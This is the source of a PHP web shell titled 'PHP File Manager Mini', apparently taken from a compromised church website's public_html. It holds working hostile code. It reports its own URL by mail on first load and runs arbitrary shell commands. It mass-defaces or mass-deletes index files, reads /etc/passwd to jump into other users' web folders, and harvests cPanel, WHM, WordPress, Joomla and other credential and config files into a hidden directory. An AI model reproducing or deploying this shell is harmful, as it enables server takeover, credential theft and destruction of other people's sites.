Current Path : /home2/church/public_html/ |
Current File : //home2/church/public_html/ |
<?php define('SEP', '/'); session_start(); function logout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); print "<script>window.location='?';</script>"; } if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; $email = [ 'email' => '', 'subject' => 'aa', 'message' => 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME'], 'header' => 'From:aa', ]; @mail($email['email'], $email['subject'], $email['message']); } ?> <title>PHP File Manager Mini</title> <style type="text/css"> body { background:#1c1c1c; color:#fff; font-family: Arial; } textarea { color:#000; background:#fff; border:1px solid #fff; width:50%; height:300px; } input[type=submit] { color:#fff; border:1px solid green; background:green; font-weight:bold; } input[type=text] { background:#fff; color:#000; border:1px solid #fff; } table, tr, td { border:1px solid green; border-spacing:0; border-collapse:collapse; } a { color:#fff; text-decoration:none; } a:hover { color:red; } th { padding:5px; background:green; } a.folder { margin: 9px 0px 0px 0px 2px; background:green; padding:3px 7px; border-radius:3px; font-size:10px; } a.folder:hover { transition:0.3s; transform:scale(1.1); background:darkgreen; color:grey; } a.file { background:green; padding:3px 7px; border-radius:3px; font-size:10px; } a.file:hover { transition:0.3s; transform:scale(1.1); background:darkgreen; color:grey; } tr.hover:hover { background:darkgreen; } tr.first { background:green } td.first { border:none; padding:-5px; } { border:none; } .dropbtn { color: white; border: none; cursor: pointer; } .dropdown { position: relative; display: inline-block; } .dropdown-content { display: none; position: absolute; background-color: #f9f9f9; min-width: 160px; box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2); z-index: 1; } .dropdown-content a { color: black; padding: 12px 16px; text-decoration: none; display: block; } .dropdown-content a:hover { background-color: #f1f1f1 } .dropdown:hover .dropdown-content { display: block; } .dropdown:hover .dropbtn { background-color:; } </style> <?php error_reporting(0); function perms($file) { $perms = fileperms($file); switch ($perms & 0xf000) { case 0xc000: // socket $info = 's'; break; case 0xa000: // symbolic link $info = 'l'; break; case 0x8000: // regular $info = 'r'; break; case 0x6000: // block special $info = 'b'; break; case 0x4000: // directory $info = 'd'; break; case 0x2000: // character special $info = 'c'; break; case 0x1000: // FIFO pipe $info = 'p'; break; default: // unknown $info = 'u'; } // Owner $info .= $perms & 0x0100 ? 'r' : '-'; $info .= $perms & 0x0080 ? 'w' : '-'; $info .= $perms & 0x0040 ? ($perms & 0x0800 ? 's' : 'x') : ($perms & 0x0800 ? 'S' : '-'); // Group $info .= $perms & 0x0020 ? 'r' : '-'; $info .= $perms & 0x0010 ? 'w' : '-'; $info .= $perms & 0x0008 ? ($perms & 0x0400 ? 's' : 'x') : ($perms & 0x0400 ? 'S' : '-'); // World $info .= $perms & 0x0004 ? 'r' : '-'; $info .= $perms & 0x0002 ? 'w' : '-'; $info .= $perms & 0x0001 ? ($perms & 0x0200 ? 't' : 'x') : ($perms & 0x0200 ? 'T' : '-'); return $info; } function w($dir, $perm) { if (!is_writable($dir)) { return "<font color=red>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } function exe($cmd) { if (function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('exec')) { @exec($cmd, $results); $buff = ""; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function pwd() { $dir = explode("/", curldir()); foreach ($dir as $key => $index) { print "<a href='?dir="; for ($i = 0; $i <= $key; $i++) { print $dir[$i]; if ($i != $key) { print "/"; } } print "'>$index</a>/"; } } ?> <table align="center" width="60%"> <tr> <th colspan="4">PHP File Manager Mini</th> </tr> <tr class="top"> <td class="first"> Current Dir : <?php print @pwd(); ?> [ <?php print w( curldir(), perms(curldir()) ); ?> ] </td> <td><center> <a href="?" style="color:lightblue;">Home</a> </td> <td><center> <a href="?dir=<?php print curldir(); ?>&action=config">Config</a> </td> <td><center> <a href="?dir=<?php print curldir(); ?>&action=multimass">Mass Deface</a> </td> </tr> <tr class="top"> <td class="first"> <?php print tools("upload"); ?> </td> <td> <center> <a href="?dir=<?php print curldir(); ?>&action=jumping">Jumping</a> </center> </td> <td><center> <a href="">Symlink</a> </center></td> <td><center> <a href="">Auto edit user</a> </center></td> <tr class="top"> <td class="first"> <?php print tools("makefile"); ?> </td> <td><center> <a href="?dir=<?php print @curldir(); ?>&action=adminer">Adminer</a> </center></td> <td><center> <a href="?dir=<?php print @curldir(); ?>&action=cmd">Command</a> </center></td> <td><center> <a href="?action=logout" style="color:red;">Logout</a> </center></td> </tr> <?php function tools($toolsname = null) { if ($toolsname === 'makefile') { function make_dir($dir, $dirname) { if (@mkdir($dir . DIRECTORY_SEPARATOR . $dirname)) { print "<script>window.location='?dir=" . $dir . '/' . $filename . "';</script>"; } else { print "Failed"; } } function make_file($dir, $filename) { if (@touch($dir . DIRECTORY_SEPARATOR . $filename)) { print "<script>window.location='?action=edit&files=" . $dir . '/' . $filename . "';</script>"; } else { print "Failed"; } } if (isset($_POST['make'])) { if ($_POST['type'] == 'make_dir') { @make_dir(curldir(), $_POST['filename']); } if ($_POST['type'] == 'make_file') { @make_file(curldir(), $_POST['filename']); } } ?> <form method="post"> <input style="width:190px;" type="text" name="filename"> <input type="radio" name="type" value="make_dir" checked> dir <input type="radio" name="type" value="make_file"> file <input type="submit" name="make"> </form> <?php } // MultiMass if ($toolsname === 'multimass') { function massdelete($dir, $filename) { print "<table align=center width=60%>"; print "<tr><th>RESULT</th></tr>"; if (is_writable($dir)) { $scandir = @scandir($dir); foreach ($scandir as $dirx) { $files = $dir . DIRECTORY_SEPARATOR . $dirx; $file = $dir . DIRECTORY_SEPARATOR . $filename; $location = $files . DIRECTORY_SEPARATOR . $filename; if ($files === '.') { if (file_exists($file)) { @unlink($file); } } if ($files === '..') { if ( file_exists( dirname($dir) . DIRECTORY_SEPARATOR . $filename ) ) { @unlink( dirname($dir) . DIRECTORY_SEPARATOR . $filename ); } } else { if (is_dir($files)) { if (is_writable($files)) { if (file_exists($location)) { print "<tr><td>[ DELETED ] => " . $location . "</td></tr>"; @unlink($location); massdelete($files, $filename); } } } } die(); } } } function massdeface($dir, $filename, $text) { print "<table align=center width=60%>"; print "<tr><th>RESULT</th></tr>"; if (is_writable($dir)) { $scandir = @scandir($dir); foreach ($scandir as $dirx) { $web = $_SERVER['HTTP_HOST']; $file = $dir . DIRECTORY_SEPARATOR . $dirx; $location = $file . DIRECTORY_SEPARATOR . $filename; if ($file === '.') { @file_put_contents($location, $text); } if ($file === '..') { @file_put_contents($location, $text); } else { if (is_dir($file)) { if (is_writable($file)) { print "<tr><td>[ DONE ] => " . $dir . DIRECTORY_SEPARATOR . $dirx . "</td>"; @file_put_contents($location, $text); } } } } } die(); } if (isset($_POST['start'])) { if ($_POST['type'] == 'massdeface') { @massdeface($_POST['dir'], $_POST['filename'], $_POST['text']); } if ($_POST['type'] == 'massdelete') { @massdelete($_POST['dir'], $_POST['filename']); } } ?> <form method="post"> <table align="center" width="60%"> <tr> <th colspan="2">Multimass</th> </tr> <tr> <td colspan="2"><center> <input type="radio" name="type" value="massdeface" checked>Massdeface <input type="radio" name="type" value="massdelete">Massdelete </center></td> </tr> <tr> <td colspan="2"> <center><p>if you used <b>Massdelete</b> please empty the text</p></center> </td> </tr> <tr> <td colspan="2"> <input style="width:100%;" type="text" name="dir" value="<?php print getcwd(); ?>"> </td> </tr> <tr> <td colspan="2"> <input style="width:100%;" type="text" name="filename" value="index.php"> </td> </tr> <tr> <td colspan="2"> <textarea style="width:100%;height:250px;" name="text" placeholder="you text"></textarea> </td> </tr> <tr> <td colspan="2"> <input style="width:100%;" type="submit" name="start"> </td> </tr> </form> </table> <?php die(); } // Upload if ($toolsname === 'upload') { if (isset($_POST['upload'])) { if ($_POST['type'] == 'biasa') { if ( @copy( $_FILES['file']['tmp_name'], curldir() . '/' . $_FILES['file']['name'] ) ) { print "Success"; } else { print "Failed"; } } } if ($_POST['type'] == 'home_root') { $home = $_SERVER['DOCUMENT_ROOT']; if ( @copy( $_FILES['file']['tmp_name'], $home . '/' . $_FILES['file']['name'] ) ) { print "Success"; } else { print "Failed"; } } ?> <form method="post" enctype="multipart/form-data"> <input type="radio" name="type" value="biasa" checked>biasa [ <?php print w(curldir(), "Writable"); ?> ] <input type="radio" name="type" value="home_root">home_root [ <?php print w($_SERVER['DOCUMENT_ROOT'], "Writable"); ?> ]<br> <input type="file" name="file"> <input type="submit" name="upload"> </form> <?php } if ($toolsname === 'jumping') { $i = 0; if (@preg_match("/hsphere/", @curldir())) { $urls = @explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { foreach ($urls as $url) { $url = @str_replace( @["http:", "www."], "", @strtolower($url) ); $etc = "/etc/passwd"; $f = @fopen($etc, "r"); while ($gets = @fgets($f)) { $pecah = @explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if (is_dir($dir_user) === true) { $url_user = $dir_user . DIRECTORY_SEPARATOR . $url; if (is_readable($url_user)) { $i++; $nb = "[ R ] <a href='?dir=" . $url_user . "'>" . $url_user . "</a>"; if (is_writable($url_user)) { $nb = "[ R ] <a href='?dir=" . $url_user . "'>" . $url_user . "</a>"; } } print "" . $nb . "<br>"; } } } } if ($i == 0) { } else { print "Total " . $i . " room di " . gethostbyname($_SERVER['HTTP_HOST']) . ""; } } else { print "<table align=center width=60%> <tr><th>Jumping</th></tr>"; print "<form method='post>'"; print "<tr><td>List Domain : </td></tr>"; print '<tr><td><textarea style="width:100%;" name="url">'; $fp = @fopen("/hsphere/local/config/httpd/sites/sites.txt", "r"); while ($getss = @fgets($fp)) { print $getss; } print "</textarea></td></tr>"; print '<tr><td><input type="submit" style="width:100%;" value="Jumping" name="jump"></td></tr>'; print "</form>"; } if (preg_match("/vhosts|vhost/", @curldir())) { preg_match("/\/var\/www\/(.*?)\//", @curldir(), $vh); $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo "<pre>"; foreach ($urls as $url) { $url = str_replace("www.", "", $url); $web_vh = "/var/www/" . $vh[1] . "/$url/httpdocs"; if (is_dir($web_vh) === true) { if (is_readable($web_vh)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; if (is_writable($web_vh)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; } echo $jrw . "<br>"; } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . gethostbyname($_SERVER['HTTP_HOST']) . ""; } echo "</pre>"; } else { echo '<center> <form method="post"> List Domains: <br> <textarea name="url" style="width: 500px; height: 250px;">'; bing("ip:$ip"); echo '</textarea><br> <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;"> </form></center>'; } } else { echo "<pre>"; ($etc = fopen("/etc/passwd", "r")) or die("<center><font color=red>Can't read /etc/passwd</font>"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<center><font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach ($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; if (is_writable($user_jumping_dir)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; } echo $jrw; if (function_exists('posix_getpwuid')) { $domain_jump = file_get_contents( "/etc/named.conf" ); if ($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all( "#/var/named/(.*?).db#", $domain_jump, $domains_jump ); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid( @fileowner("/etc/valiases/$dj") ); $user_jumping_url = $user_jumping_url['name']; if ( $user_jumping_url == $user_idx_jump ) { echo " => ( <u>$dj</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . gethostbyname($_SERVER['HTTP_HOST']) . ""; } echo "</pre>"; } } if ($toolsname === 'adminer') { $full = @str_replace($_SERVER['DOCUMENT_ROOT'], "", @curldir()); function adminer($full, $text) { $fp = @fopen($text, "w"); $ch = @curl_init(); @curl_setopt($ch, @CURLOPT_URL, $url); @curl_setopt($ch, @CURLOPT_BINARYTRANSFER, true); @curl_setopt($ch, @CURLOPT_RETURNTRANSFER, true); @curl_setopt($ch, @CURLOPT_SSL_VERIFYPEER, false); @curl_setopt($ch, @CURLOPT_FILE, $fp); return @curl_exec($ch); @curl_close($ch); @fclose($fp); @ob_flush(); @flush(); } if (@file_exists("adminer.php")) { print "<a href='" . $full . DIRECTORY_SEPARATOR . "adminer.php'>Adminer Login</a>"; } else { if ( @adminer( "", "adminer.php" ) ) { print "<a href='" . $full . DIRECTORY_SEPARATOR . "adminer' target='_blank'>Adminer Login</a>"; } else { print "Failed creat adminer"; } } } if ($toolsname === 'config') { if (!file_exists('.config')) { @mkdir('.config'); } if (!file_exists('.config/config')) { @mkdir('.config/config'); } if (!file_exists('.config/config/.htaccess')) { $isi = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin"; file_put_contents('.config/config/.htaccess', $isi); } if (@preg_match("/vhosts|vhost/", $dir)) { $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); if (!file_exists('.config/config/vhost.cin')) { @file_put_contents( '.config/config/vhost.cin', @gzinflate( @urldecode( @file_get_contents( '' ) ) ) ); @chmod('.config/config/vhost.cin', 777); } if (exe("cd .config/config && ./vhost.cin")) { echo "<center><a href='$link_config/.config/config'><font color=lime>Done</font></a></center>"; } else { print "<center><a href='$link_config/.config/config/vhost.cin'><font color=lime>Done</font></a></center>"; } } else { ($etc = @fopen("/etc/passwd", "r")) or die("<pre><font color=red>Can't read /etc/passwd</font></pre>"); while ($passwd = fgets($etc)) { if ($passwd == "" || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); if (file_exists('/home/')) { $home = 'home'; } elseif (file_exists('/home1/')) { $home = 'home1'; } elseif (file_exists('/home2/')) { $home = 'home2'; } elseif (file_exists('/home3/')) { $home = 'home3'; } elseif (file_exists('/home4/')) { $home = 'home4'; } foreach ($user_config[1] as $user_idx) { $user_config_dir = "/$home/$user_idx/public_html"; if (is_readable($user_config_dir)) { $grab_config = [ "/$home/$user_idx/.my.cnf" => "cpanel", "/$home/$user_idx/.accesshash" => "WHM-accesshash", "$user_config_dir/po-content/config.php" => "Popoji", "$user_config_dir/vdo_config.php" => "Voodoo", "$user_config_dir/bw-configs/config.ini" => "BosWeb", "$user_config_dir/config/koneksi.php" => "Lokomedia", "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia", "$user_config_dir/koneksi.php" => "Lokomedia", "$user_config_dir/clientarea/configuration.php" => "WHMCS", "$user_config_dir/whm/configuration.php" => "WHMCS", "$user_config_dir/whmcs/configuration.php" => "WHMCS", "$user_config_dir/forum/config.php" => "phpBB", "$user_config_dir/sites/default/settings.php" => "Drupal", "$user_config_dir/config/" => "PrestaShop", "$user_config_dir/app/etc/local.xml" => "Magento", "$user_config_dir/joomla/configuration.php" => "Joomla", "$user_config_dir/configuration.php" => "Joomla", "$user_config_dir/wp/wp-config.php" => "WordPress", "$user_config_dir/wordpress/wp-config.php" => "WordPress", "$user_config_dir/wp-config.php" => "WordPress", "$user_config_dir/admin/config.php" => "OpenCart", "$user_config_dir/slconfig.php" => "Sitelok", "$user_config_dir/application/config/database.php" => "Ellislab", "$user_config_dir/config/database.php" => "Ellislab", "$user_config_dir/models/db-settings.php" => "Usercake", "$user_config_dir/config/database.php" => "Laravel", "$user_config_dir/database.php" => "Laravel", "$user_config_dir/application/config.ini" => "Zend", "$user_config_dir/config/app.php" => "CakePHP", "$user_config_dir/phalcon/config/adapter/ini.zep" => "Phalcon", "$user_config_dir/config/adapter/ini.zep" => "Phalcon", "$user_config_dir/app/config/configuration.yml" => "Symphony", "$user_config_dir/app/config/databases.yml" => "Symphony", "$user_config_dir/config/configuration.yml" => "Symphony", "$user_config_dir/config/databases.yml" => "Symphony", "$user_config_dir/config/db.php" => "FuelPHP & Yii2", "$user_config_dir/src/settings.php" => "Slim", ]; foreach ($grab_config as $config => $nama_config) { $ambil_config = @file_get_contents($config); if (!empty($ambil_config)) { $file_config = fopen( ".config/config/$user_idx-$nama_config.txt", "w" ); fputs($file_config, $ambil_config); fclose($file_config); } } } } } } echo "<center><a href='?dir=" . curldir() . DIRECTORY_SEPARATOR . $dir . "/.config/config'>Done</a></center>"; } die(); } } function curldir() { if (isset($_GET['dir'])) { $dir = str_replace("\\", "/", $_GET['dir']); @chdir($dir); } else { $dir = str_replace("\\", "/", getcwd()); } return $dir; } function scdir() { $dir = @scandir(curldir()); return $dir; } function edit($dir) { if (isset($_POST['edit'])) { if (@file_put_contents($dir, $_POST['edit'])) { $nb = "Success"; } else { $nb = "Failed"; } } $text = @htmlspecialchars(@file_get_contents($dir)); ?> <table align="center" width="60%"> <tr><th colspan="5">FILE EDITOR</th></tr> <tr> <td>Filename :</td> <td ><?php print $dir; ?></td><td colspan="3"><center><?php print $nb; ?></td> <tr> <td>File Size :</td> <td colspan="4"><?php print size($dir); ?></td> <tr> <td>MIME-type :</td> <td colspan="4"><?php print type($dir); ?></td> <tr> <tr> <td>Permission : </td> <td colspan="4"><?php print w($dir, perms($dir)); ?></td> <tr> <td><center> <a href="?action=edit&url=<?php print curldir(); ?>&files=<?php print $dir; ?>"> <font color="lime"><b>Edit</b></font> </a></center></td> <td><center> <a href='?action=renames&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Rename </a></center></td> <td><center> <a href="?action=chmods&url=<?php print curldir(); ?>&files=<?php print $dir; ?>"> Chmod </a></center></td> <td><center> <a href='?action=delete&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Delete </a></center></td> <td><center> <a href='?action=download&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Download </a></center></td> <form method="post"> <tr> <td colspan="5"> <textarea style="width:100%;" name="edit"><?php print $text; ?></textarea></td> <tr> <td colspan="5"><input style="width:100%;" type="submit"></td> </form> </center> <?php die(); } function delete($dir) { if (@is_dir($dir)) { $scandir = @scandir($dir); foreach ($scandir as $object) { if ($object != '.' && $object != '..') { if (@is_dir($dir . DIRECTORY_SEPARATOR . $object)) { @delete($dir . DIRECTORY_SEPARATOR . $object); } else { @unlink($dir . DIRECTORY_SEPARATOR . $object); } } } if (@rmdir($dir)) { print "<script>window.location='?dir=" . curldir() . "';</script>"; } else { return false; } } else { if (@unlink($dir)) { print "<script>window.location='?dir=" . curldir() . "';</script>"; } else { return false; } } } function renames($dir) { if (isset($_POST['name'])) { if (@file_exists($dir)) { if (@rename($dir, $_POST['name'])) { $nb = "<script>window.location='?action=renames&dir=" . curldir() . "&files=" . $_POST['name'] . "';</script>"; } else { $nb = "Failed"; } } } ?> <table align="center" width="60%"> <tr><th colspan="5">RENAME</th></tr> <tr> <td>Filename : </td> <td><?php print $dir; ?></td><td colspan="3"><center><?php print $nb; ?></td> <tr> <td>File Size : </td> <td colspan="4"><?php print size($dir); ?></td> <tr> <td>MIME-type : </td> <td colspan="4"><?php print type($dir); ?></td> <tr> <tr> <td>Permission : </td> <td colspan="4"><?php print w($dir, perms($dir)); ?></td> <tr> <td><center> <a href="?action=edit&url=<?php print curldir(); ?>&files=<?php print $dir; ?>"> Edit </a></center></td> <td><center> <a href='?action=renames&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> <font color="lime"><b>Rename</b></font> </a></center></td> <td><center> <a href="?action=chmods&url=<?php print curldir(); ?>&files=<?php print $dir; ?>"> Chmod </a></center></td> <td><center> <a href='?action=delete&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Delete </a></center></td> <td><center> <a href='?action=download&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Download </a></center></td> <form method="post"> <tr><td colspan="4"> <input style="width:100%;" type="text" name="name" value="<?php print $dir; ?>"></td> <td><input style="width:100%;" type="submit"></td> </form> </center> <?php die(); } function chmods($dir) { if (@file_exists($dir)) { if (isset($_POST['chmods'])) { if (@chmod($dir, $_POST['chmods'])) { $nb = "Success"; } else { $nb = "Failed"; } } } $mode = @substr(@sprintf('%o', @fileperms($dir)), -4); ?> <table align="center" width="60%"> <tr><th colspan="5">CHMOD</th></tr> <tr> <td>Filename : </td> <td ><?php print $dir; ?></td><td colspan="3"><center><?php print $nb; ?></td> <tr> <td>File Size : </td> <td colspan="4"><?php print size($dir); ?></td> <tr> <td>MIME-type : </td> <td colspan="4"><?php print type($dir); ?></td> <tr> <tr> <td>Permission : </td> <td colspan="4"><?php print w($dir, perms($dir)); ?></td> <tr> <td><center> <a href="?action=edit&url=<?php print curldir(); ?>&files=<?php print $dir; ?>"> Edit </a></center></td> <td><center> <a href='?action=renames&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Rename </a></center></td> <td><center> <a href="?action=chmods&url=<?php print curldir(); ?>&files=<?php print $dir; ?>"> <font color="lime"> <b>Chmod</b></font> </a></center></td> <td><center> <a href='?action=delete&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Delete </a></center></td> <td><center> <a href='?action=download&url=<?php print curldir(); ?>&files=<?php print $dir; ?>'> Download </a></center></td> <form method="post"> <tr><td colspan="4"> <center> <input style="width:100%;" type="text" name="chmods" value="<?php print $mode; ?>"> </center> </td> <td> <input style="width:100%;" type="submit"> </td> </form> </center> <?php die(); } function download($dir) { @ob_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header( 'Content-Disposition: attachment; filename="' . basename($dir) . '"' ); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($dir)); readfile($dir); exit(); } function Size($file) { $size = filesize($file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } return $size; } function view($filename) { $text = @htmlspecialchars(@file_get_contents($filename)); ?> <table align="center" width="60%"> <tr> <td> <textarea style="width:100%;" readonly><pre><?php print $text; ?></pre></textarea> </td> </tr> </table> <?php exit(); } function type($filename) { if (@function_exists('finfo_open')) { $finfo = @finfo_open(FILEINFO_MIME_TYPE); $mime = @finfo_file($finfo, $filename); @finfo_close($finfo); return $mime; } elseif (@file_exists('mime_content_type')) { return @mime_content_type($filename); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($filename); $mime = shell_exec('file -bi' . $file); return $mime; } else { return "--"; } } if (@$_GET['action'] == 'edit' and isset($_GET['files'])) { @edit($_GET['files']); } elseif (@$_GET['action'] == 'delete' and isset($_GET['files'])) { @delete($_GET['files']); } elseif (@$_GET['action'] == 'renames' and isset($_GET['files'])) { @renames($_GET['files']); } elseif (@$_GET['action'] == 'download' and isset($_GET['files'])) { @download($_GET['files']); } elseif (@$_GET['action'] == 'multimass') { @tools("multimass"); } elseif (@$_GET['action'] == 'chmods' and isset($_GET['files'])) { @chmods($_GET['files']); } elseif (@$_GET['action'] == 'view' and isset($_GET['files'])) { @view($_GET['files']); } elseif (@$_GET['action'] == 'jumping') { @tools("jumping"); } elseif (@$_GET['action'] == 'adminer') { @tools("adminer"); } elseif (@$_GET['action'] == 'config') { @tools("config"); } elseif (@$_GET['action'] == 'logout') { @logout(); } elseif (@$_GET['action'] == 'cmd') { ?> <table align="center" width="60%"> <tr> <th colspan="2">Command</th> </tr> <form method='post'> <td><input type='text' style="width:100%;" name='cmd'></td> <td><input type='submit' style="width:100%;" name='do_cmd'></td><tr> </form> <?php if ($_POST['do_cmd']) { echo "<td colspan='2'><pre>" . exe($_POST['cmd']) . "</pre></td>"; } die(); } function filemanager() { print "<table align='center' width='60%'>"; print "<tr><th>Filename</th>"; print "<th>Type</th>"; print "<th>Size</th>"; print "<th>Permission</th>"; print "</tr>"; foreach (scdir() as $folder) { if (!is_dir(curldir() . DIRECTORY_SEPARATOR . $folder)) { continue; } if ($folder === '.' || $folder === '..') { continue; } $tool = " <a href='?action=renames&dir=" . curldir() . "&files=" . $folder . "'>Rename</a> <a href='?action=delete&dir=" . curldir() . "&files=" . $folder . "'>Delete</a>"; print "<tr class='hover'><td><img src='" . "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp" . "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> "; print "<div class='dropdown'>"; print "<a class='dropbtn' href='?dir=" . curldir() . DIRECTORY_SEPARATOR . $folder . "'>" . $folder . "<a>"; print "<div class='dropdown-content'>"; print $tool; print "</td><td><center>" . type($folder) . "</center></td>"; print "<td><center>--</center></td>"; print "<td><center>"; print @w($folder, @perms($folder)); print "</center></td>"; } print "<tr class='first'><td></td><td></td><td></td><td></td></tr>"; foreach (scdir() as $file) { if (!is_file(curldir() . DIRECTORY_SEPARATOR . $file)) { continue; } $tools = " <a href='?action=view&dir=" . @curldir() . "&files=" . @curldir() . SEP . $file . "'> View</a> <a href='?action=renames&dir=" . @curldir() . "&files=" . @curldir() . SEP . $file . "'> Rename</a> <a href='?action=chmods&dir=" . @curldir() . "&files=" . @curldir() . SEP . $file . "'> Chmod</a> <a href='?action=delete&dir=" . @curldir() . "&files=" . @curldir() . SEP . $file . "'> Delete</a> <a href='?action=download&dir=" . @curldir() . "&files=" . @curldir() . SEP . $file . "'> Download</a>"; print "<tr class='hover'><td><img src=''> "; print "<div class='dropdown'>"; print "<a class='dropbtn' href='?action=edit&dir=" . @curldir() . "&files=" . @curldir() . SEP . $file . "'>" . $file . "</a>"; print "<div class='dropdown-content'>"; print $tools; print "</td><td><center>" . type($file) . "</center></td>"; print "<td><center>" . size($file) . "</center></td>"; print "<td><center>"; print @w($file, @perms($file)); print "</center></td>"; } } @filemanager(); ?> <tr> <th colspan="4">© X <?php print date("Y"); ?></th> </tr>